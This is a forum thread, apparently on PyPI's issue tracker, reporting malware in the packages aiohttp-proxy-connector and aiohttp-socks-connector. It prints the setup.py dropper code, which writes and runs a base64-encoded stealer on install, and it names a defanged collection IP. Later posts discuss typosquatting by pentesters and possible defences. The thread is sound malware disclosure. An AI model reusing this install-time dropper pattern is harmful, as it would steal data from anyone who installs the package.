Malware package on PyPI

[katant]

Following package has malware in it https://pypi.org/project/aiohttp-proxy-connector/ (version 0.2.4)
https://files.pythonhosted.org/packages/90/f4/c58223b905c4ad88a50f1cf06a8abf155536b131703fd092162af5d0aecb/aiohttp_proxy_connector-0.2.4.tar.gz
SHA256: 755e79308a30418bf070cb0f96d4e8cb0b2db85424f16b19a447c31333910657
setup.py contains script, that drops base64-encoded .py file and running it
def run(): import sys from os import chdir, environ from os.path import join from subprocess import call executable = sys.executable.replace('\\', '\\\\') LOCAL = environ['USERPROFILE'] TEMP = join(LOCAL, 'appdata', 'local', 'temp') main_dir = join(TEMP, '__pycache__') chdir(main_dir) call(f"{executable} main.cpython-39.py") with open(join(main_dir, 'main.cpython-39.py'), 'w', encoding='utf8') as f: f.write(b64('...long line...')) run()

Base64-encoded script is python obfuscated stealer:

And everything collected from victum PC will be sent to hxxp://144.24.115.170

[katant]

Another package, aiohttp_socks_connector, from same maintainer, also has malware in in.
https://pypi.org/project/aiohttp-socks-connector/

Another base64-encoded py file in setup.py

[di]

Thanks, this has been removed. In the future, please email admin@pypi.org directly, thanks!

[KOLANICH]

I have accidentially noticed a typesquatting and name hijacking campaign on pypi (I won't name it and its author). The name within description of an account from which they have been sent suggest these are by some pentester from hackerone and hackerhero. IDK if the packages have been downloaded. Also they look clean enough, I don't see any exfiltrating code within them. A noticeable feature of them is that they contain bullshit in their short description and source code contents of them is the same, and the name of the actual package inside doesn't even remotely match the name in their metadata.

I guess the pentester may be waiting for actual installs appearing, and then update them witn malware (though there is only 1 package in his acc that has ever been updated, and the both versions look clean).

This exact pattern can be combatted with fuzzy hashes, but it is easily avoided and the overhead of the checking given benefit from lack of such packages doesn't worth.

But you can try to combat typesquatting at least. Compose a dict of names of popular software and packages not on pypi and check against it too.

And provide an option for pentesters to mark their packages as pentest ones (without any consequences for the downloading side, downloads should not be blocked) in order not to keep that garbage on pypi ethernally.

[di]

If you've found malware on PyPI, including attempts at pentesting, please follow our security policy here: https://pypi.org/security